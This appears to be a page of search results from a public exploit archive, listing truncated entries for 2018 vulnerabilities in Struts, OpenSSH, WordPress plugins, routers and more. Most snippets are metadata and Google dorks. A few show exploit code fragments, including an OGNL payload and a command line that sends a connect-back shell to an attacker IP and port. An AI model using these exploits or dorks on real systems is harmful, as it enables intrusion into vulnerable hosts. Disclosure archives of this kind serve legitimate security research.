47885 matches found
Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)
Exploit Title: Gleez CMS 1.2.0 - Cross-Site Request Forgery Add Admin Date: 2018-08-24 Exploit Author: GunEggWang Vendor Homepage: https://gleezcms.org/ Software Link: https://github.com/gleez/cms Version: 1.2.0 CVE : CVE-2018-15845 Description: There is a CSRF vulnerability that can add an...
CuteFTP 5.0 - Buffer Overflow
Exploit Title: CuteFTP 5.0 - Buffer Overflow Author: Matteo Malvica Date: 2018-08-26 Vendor homepage: www.globalscape.com Software: CuteFTP 5.0.4 XP - build 54.8.6.1 Software Link: http://installer.globalscape.com/pub/cuteftp/archive/english/cuteftp50.exe Tested on: Windows XP Professional SP3...
ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
Exploit Title: ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting Date: 2018-08-21 Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.manageengine.com/ Hardware Link : https://www.manageengine.com/products/ad-manager/ Software : ZOHO Corp ManageEngine ADManager Plus Product Versio...
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1)
!/usr/bin/env python3 coding=utf-8 struts-pwn: Apache Struts CVE-2018-11776 Exploit Author: Mazin Ahmed This code uses a payload from: https://github.com/jas502n/St2-057 import argparse import random import requests import sys try: from urllib import parse as urlparse except ImportError: import...
WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL Injection
Exploit Title: WordPress Plugin Gift Voucher 1.0.5 - 'templateid' SQL Injection Google Dork: intext:"/wp-content/plugins/gift-voucher/" Date: 2018-08-23 Exploit Author: Renos Nikolaou Software Link: https://wordpress.org/plugins/gift-voucher/ Vendor Homepage: http://www.codemenschen.at/ Version:...
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2)
!/usr/bin/python -- coding: utf-8 -- hook-s3c github.com/hook-s3c, @hooks3c on twitter import sys import urllib import urllib2 import httplib def exploithost,cmd: print "Execute: ".formatcmd ognlpayload = "$" ognlpayload += "memberAccess'allowStaticMethodAccess'=true." ognlpayload +=...
ManageEngine ADManager Plus 6.5.7 - HTML Injection
Exploit Title: ManageEngine ADManager Plus 6.5.7 - HTML Injection Date: 2018-08-21 Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.manageengine.com/ Hardware Link : https://www.manageengine.com/products/ad-manager/ Software : ZOHO Corp ManageEngine ADManager Plus Product Version: 6.5...
UltimatePOS 2.5 - Remote Code Execution
Exploit Title: UltimatePOS 2.5 - Remote Code Execution Google Dork: intext:"UltimatePOS" Date: 2018-08-22 Exploit Author: Renos Nikolaou Vendor Homepage: http://ultimatefosters.com/ Software Link: https://codecanyon.net/item/saas-superadmin-module-for-ultimatepos-advance/22394431 Version: 2.5...
Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)
Title: Vox TG790 ADSL Router - Cross-Site Request Forgery Add Admin Author: Cakes Exploit Date: 2018-08-01 Vendor: Vox Telecom Link: https://www.vox.co.za/ Firmware Version: 6.2.W.1 CVE: N/A Description Due to improper session management low privilege users are able to create administrator accoun...
SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)
Exploit Title: SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-08-23 Vendor Homepage: https://www.skype.com/es/home/ Tested Version: 12.8.487.0 Vulnerability Type: Denial of Service DoS Local Tested on OS: Windows 10 Pro x...
PCViewer vt1000 - Directory Traversal
Exploit Title: PCViewer vt1000 - Directory Traversal Exploit Author: Berk Dusunur Google Dork: N/A Type: Hardware Date: 2018-07-21 Vendor Homepage: N/A Software Link: http://www.softpedia.com/get/System/File-Management/Pc-Viewer.shtml Affected Version: vt1000 Tested on: Parrot OS CVE : N/A Proof ...
StyleWriter 4 1.0 - Denial of Service (PoC)
Exploit Title: StyleWriter 4 1.0 - Denial of Service PoC Author: Gionathan "John" Reale Discovery Date: 2018-08-23 Homepage: http://www.editorsoftware.com Software Link: http://www.editorsoftware.com/StyleWriterDownload.php Tested Version: 1.0 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run...
Epiphany Web Browser 3.28.1 - Denial of Service (PoC)
Exploit Title: Epiphany Web Browser 3.28.1 - Denial of Service PoC Author: Dhiraj Mishra Date: 2018-08-23 Software: https://projects-old.gnome.org/epiphany/ Version: 3.28.1 CVE: N/A Tested on: Ubuntu 18 64bit Steps to reproduce: 1. Open epiphany browser 2. Bookmark any random page 3. Then navigat...
Twitter-Clone 1 - 'code' SQL Injection
Exploit Title: Twitter-Clone 1 - 'code' SQL Injection Date: 2018-08-22 Exploit Author: L0RD Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ Version: 1 CVE: N/A Tested on: Win 10 vulnerable files : mailactivation.php , stalkers.php , search.php vulnerable parameters : name , code , id...
CuteFTP 8.3.1 - Denial of Service (PoC)
Exploit Title : CuteFTP 8.3.1 - Denial Of Service PoC Exploit Author : Ali Alipour WebSite : Alipour.it Date: 2018-08-22 Vendor Homepage : http://www.cuteftp.com/ Software Link Download : https://filehippo.com/downloadcuteftppro/4518/ Tested on : Windows 10 - 64-bit Steps to Reproduce Run the...
Geutebrueck re_porter 16 - Cross-Site Scripting
Exploit Title: Geutebrueck reporter 16 - Cross-Site Scripting Date: 2018-08-03 Exploit Author: Kamil Suska Vendor: https://www.geutebrueck.com/enUS.html Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html Version: prior 7.8.974.20 CVE-2018-15533 Attack Vectors...
Ghostscript - Multiple Vulnerabilities
http://seclists.org/oss-sec/2018/q3/142 These are critical and trivial remote code execution bugs in things like ImageMagick, Evince, GIMP, and most other PDF/PS tools. ---- Hello, this was discussed on the distros list, but it was suggested to move discussion to oss-security. You might recall I...
Easyboot 6.6.0 - Denial Of Service (PoC)
Exploit Title: Easyboot 6.6.0 - Denial Of Service PoC Author: Gionathan "John" Reale Discovery Date: 2018-08-22 Homepage: http://www.ezbsystems.com/ Software Link: http://www.ezbsystems.com/easyboot/download.htm Tested Version: 6.6.0 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run the pytho...
UltraISO 9.7.1.3519 - Denial Of Service (PoC)
Exploit Title : UltraISO 9.7.1.3519 - Denial Of Service PoC Exploit Author : Ali Alipour WebSite : Alipour.it Date: 2018-08-22 Vendor Homepage : https://www.ultraiso.com Software Link Download : https://www.ultraiso.com/download.html Tested on : Windows 10 - 64-bit Steps to Reproduce Run the pyth...
Softdisk 3.0.3 - Denial Of Service (PoC)
Exploit Title: Softdisk 3.0.3 - Denial Of Service PoC Author: Gionathan "John" Reale Discovery Date: 2018-08-22 Homepage: http://www.ezbsystems.com/ Software Link: https://www.ezbsystems.com/softdisc/download.htm Tested Version: 3.0.3 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run the pyth...
Geutebrueck re_porter 7.8.974.20 - Credential Disclosure
Exploit Title: Geutebrueck reporter 7.8.974.20 - Credential Disclosure Date: 2018-08-03 Exploit Author: Kamil Suska Vendor: https://www.geutebrueck.com/enUS.html Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html Version: prior 7.8.974.20 CVE-2018-15534 PoC GET...
ZyXEL VMG3312-B10B - Cross-Site Scripting
Exploit Title: ZyXEL VMG3312-B10B - Cross-Site Scripting Date: 2018-08-21 Exploit Author: Samet ŞAHİN Vendor Homepage: https://www.zyxel.com/ Software Link: ftp://ftp.zyxel.com.tr/ZyXELURUNLERI/MODEMLER/VDSLMODEMLER/VMG3312-B10B/ Version: ZyXEL VMG3312-B10B Tested on: Mozilla Firefox 61.0.2 &...
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation
SystemCollector PoC for Privilege Escalation in Windows 10 Diagnostics Hub Standard Collector Service Affected Products Windows 10 Windows Server Windows Server 2016 Visual Studio 2015 Update 3 Visual Studio 2017 Summary The Diagnostics Hub Packaging library, used by Windows Standard Collector...
Project64 2.3.2 - Buffer Overflow (SEH)
Exploit Title: Project64 2.3.2 - Local BufferOverflow SEH Date: 2018-08-21 Author: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Software Link:https://www.pj64-emu.com/download/project64-latest Tested Version: 2.3.2 Tested on OS: Windows XP Service Pack 3 x86 , Windows 7 ultimate x8...
KingMedia 4.1 - File Upload
Exploit Title: KingMedia 4.1 - Remote Code Execution Author: Efren Diaz Exploit Date: 2018-08-15 Software: KingMedia Version: 1.x, 2.x, 3.x, 4.1 Link: https://codecanyon.net/item/king-media-video-image-upload-and-share/7877877 CVE: N/A \n\n"; echo " -target: http://site.com/... required\n"; echo ...
Textpad 7.6.4 - Denial Of Service (PoC)
Exploit Title: Textpad 7.6.4 - Denial Of Service PoC Author: Gionathan "John" Reale Discovery Date: 2018-08-22 Homepage: https://textpad.com Software Link: https://textpad.com/download/v76/win32/txpeng764-32.zip Tested Version: 7.6.4 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run the pytho...
Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)
Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery Delete Post Date: 2018-08-21 Exploit Author: L0RD Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ Version: 1 CVE: N/A Tested on: Win 10 Description : An issue was discovered in Twitter-Clone 1 which allows a remote attacker ...
Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)
Exploit title: Hikvision IP Camera 5.4.0 - User Enumeration Metasploit Author: Alfie Date: 2018-08-21 Website: https://www.hikvision.com/en/ Software: Hikvision Camera Versions: DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530 DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0...
WordPress Plugin Ninja Forms 3.3.13 - CSV Injection
Exploit Title: WordPress Plugin Ninja Forms 3.3.13 - CSV Injection Exploit Author: Mostafa Gharzi Website: https://www.certcc.ir Date: 2018-08-19 Google Dork: N/A Vendor: The WP Ninjas Software Link: https://wordpress.org/plugins/ninja-forms/ Affected Version: 3.3.13 and before Active...
Project64 2.3.2 - Denial Of Service (PoC)
Exploit Title: Project64 2.3.2 - Denial Of Service PoC. Author: Gionathan "John" Reale Discovery Date: 2018-08-21 Homepage: https://www.pj64-emu.com Software Link: https://www.pj64-emu.com/download/project64-latest Tested Version: 2.3.2 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run the...
OpenSSH 2.3 < 7.7 - Username Enumeration
Exploit: OpenSSH 7.7 - Username Enumeration Author: Justin Gardner Date: 2018-08-20 Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz Affected Versions: OpenSSH version 7.7 CVE: CVE-2018-15473...
Twitter-Clone 1 - 'userid' SQL Injection
Exploit Title: Twitter-Clone 1 - 'userid' SQL Injection Date: 2018-08-21 Exploit Author: L0RD Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ Version: 1 CVE: N/A Tested on: Win 10 POC : SQLi vulnerable files : follow.php , index.php vulnerable parameters : userid , username 1...
WordPress Plugin Tagregator 0.6 - Cross-Site Scripting
Exploit Title: WordPress Plugin Tagregator 0.6 - Cross-Site Scripting Date: 2018-05-05 Exploit Author: ManhNho Vendor Homepage: https://wordpress.org/plugins/tagregator/ Software Link: https://downloads.wordpress.org/plugin/tagregator.0.6.zip Ref: https://pastebin.com/ZGr5tyP2 Version: 0.6 Tested...
MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery
Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery Date: 2018-05-17 Author: 0xB9 Twitter: @0xB9Sec Software Link: https://community.mybb.com/mods.php?action=view&pid=1105 Version: 1.1 Tested on: Ubuntu 18.04 1. Description: The plugin allows moderators to save notes a...
Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)
Exploit Title: Zortam MP3 Media Studio 23.95 - Denial of Service PoC Author: Gionathan "John" Reale Discovery Date: 2018-08-19 Homepage: https://www.zortam.com Software Link: https://www.zortam.com/download.html Tested Version: 23.95 Tested on OS: Windows 7 x64 Steps to Reproduce: Run the python...
SEIG Modbus 3.4 - Denial of Service (PoC)
Title: SEIG Modbus 3.4 - Denial of Service PoC Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4 Version: v3.4...
Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution
!/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337 Easylogin Pro = v1.3.0...
Countly - Cross-Site Scripting
Exploit Title: Countly-server StoredPersistent XSS Vulnerability Date: Monday - 2018 13 August Author: 10:10AM Team Discovered By: Sleepy Software Link: https://github.com/Countly/countly-server Version: All Version Category: Web-apps Security Risk: Critical Tested on: GNU/Linux Ubuntu 16.04 - wi...
SEIG Modbus 3.4 - Remote Code Execution
Title: SEIG Modbus 3.4 - Remote Code Execution Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4 Version: v3.4...
Restorator 1793 - Denial of Service (PoC)
Exploit Title: Restorator 1793 - Denial of Service PoC Author: Gionathan "John" Reale Discovery Date: 2018-08-19 Homepage: https://www.bome.com/ Software Link: https://www.bome.com/bome/downloads/Restorator2018Full1793.exe Tested Version: v1793 Tested on OS: Windows 7 x64 Steps to Reproduce: Run t...
Prime95 29.4b7 - Denial Of Service (PoC)
Exploit Title: Prime95 29.4b7 - Denial Of Service PoC Author: Gionathan "John" Reale Discovery Date: 2018-08-20 Homepage: http://www.mersenne.org Software Link: http://www.mersenne.org/ftproot/gimps/p95v294b7.win32.zip Tested Version: 29.4b7 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run t...
WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection
Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection Exploit Author: Çlirim Emini Website: https://www.sentry.co.com Software Link: https://wordpress.org/plugins/chained-quiz/ Version/s: 1.0.8 and below Patched Version: 1.0.9 CVE : N/A WPVULNDB:...
SEIG SCADA System 9 - Remote Code Execution
Title: SEIG SCADA SYSTEM 9 - Remote Code Execution Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link: https://www.schneider-electric.ie/en/download/document/V9Fullinstallationpackageregisterandreceivefile/ Version: v9 Tested on: Windows7 x...
Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion
/ Here's the method. template template void DictionaryPropertyDescriptor::CopyFromDictionaryPropertyDescriptor& descriptor this-Attributes = descriptor.Attributes; this-Data = descriptor.Data == DictionaryPropertyDescriptor::NoSlots ? NoSlots : descriptor.Data; this-Getter = descriptor.Getter ==...
CEWE Photoshow 6.3.4 - Denial of Service (PoC)
Exploit Title: CEWE Photoshow 6.3.4 - Denial of Service PoC Author: Gionathan "John" Reale Discovery Date: 2018-08-17 Homepage: https://cewe-photoworld.com/ Software Link: https://cewe-photoworld.com/creator-software/windows-download Tested Version: 6.3.4 Tested on OS: Windows 10 Steps to Reproduc...
ADM 3.1.2RHG1 - Remote Code Execution
Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution Author: Matthew Fulton & Kyle Lovett Date: 2018-07-01 Vendor Homepage: https://www.asustor.com/ Software Link: http://download.asustor.com/download/adm/X64G33.1.2.RHG1.img Version: = ADM 3.1.2RHG1 Tested on: ASUSTOR AS6202T CVE : CVE-2018-11510...
Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion
/ The InitializeNumberFormat function in Intl.js is used to initialize an Intl.NumberFormat object, and InitializeDateTimeFormat is used for an Intl.DateTimeFormat object. There are two versions of each initializer. One is for WinGlob and the other is for ICU. The problem is that the versions for...
Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion
/ This is similar to issue 1531. The patch seems to prevent type confusion triggered from StElemIA instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlined. We can achieve type confusion with the push method in the same way used for...
Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl
/ If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag. In the PoC, it redefines Map.prototype.get to intercept the execution of...
Mikrotik WinBox 6.42 - Credential Disclosure (golang)
/ Title: Mikrotik WinBox 6.42 - Credential Disclosure golang edition Author: Maxim Yefimenko @slider Date: 2018-08-06 Software Link: https://mikrotik.com/download Vendor Page: https://www.mikrotik.com/ Version: 6.29 - 6.42 Tested on: Fedora 28 \ Debian 9 \ Windows 10 \ Android wherever it was...